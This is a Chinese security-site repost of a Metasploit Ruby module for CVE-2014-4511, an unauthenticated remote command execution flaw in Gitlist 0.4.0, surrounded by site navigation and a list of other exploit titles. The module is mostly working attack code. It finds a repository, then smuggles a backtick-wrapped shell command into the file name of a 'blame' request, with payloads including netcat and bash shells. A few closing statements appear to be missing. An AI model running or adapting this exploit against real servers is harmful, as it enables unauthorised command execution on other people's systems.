Gitlist Unauthenticated Remote Command Execution Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Gitlist Unauthenticated Remote Command Execution Exploit

来源：metasploit.com 作者：Perry 发布时间：2014-07-07

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Gitlist Unauthenticated Remote Command Execution',

'Description' => %q{

This module exploits an unauthenticated remote command execution vulnerability

in version 0.4.0 of Gitlist. The problem exists in the handling of an specially

crafted file name when trying to blame it.

},

'License' => MSF_LICENSE,

'Privileged' => false,

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Author' =>

[

'drone', #discovery/poc by @dronesec

'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module

],

'References' =>

[

['CVE', '2014-4511'],

['EDB', '33929'],

['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']

],

'Payload' =>

{

'Space' => 8192, # max length of GET request really

'BadChars' => "&\x20",

'DisableNops' => true,

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',

}

},

'Targets' =>

[

['Gitlist 0.4.0', { }]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Jun 30 2014'

))

register_options(

[

OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])

], self.class)

end

def check

repo = get_repo

if repo.nil?

return Exploit::CheckCode::Unknown

end

chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))

res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")

if res && res.body

if res.body.include?(Rex::Text.decode_base64(chk))

return Exploit::CheckCode::Vulnerable

elsif res.body.to_s =~ /sh.*not found/

return Exploit::CheckCode::Vulnerable

end

Exploit::CheckCode::Safe

end

def exploit

repo = get_repo

if repo.nil?

fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")

end

send_command(repo, payload.encoded)

end

def get_repo

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, "/")

})

unless res

return nil

end

first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)

unless first_repo && first_repo.length >= 2

return nil

end

repo_name = first_repo[1]

repo_name

end

def send_command(repo, cmd)

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')

}, 1)

res

end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告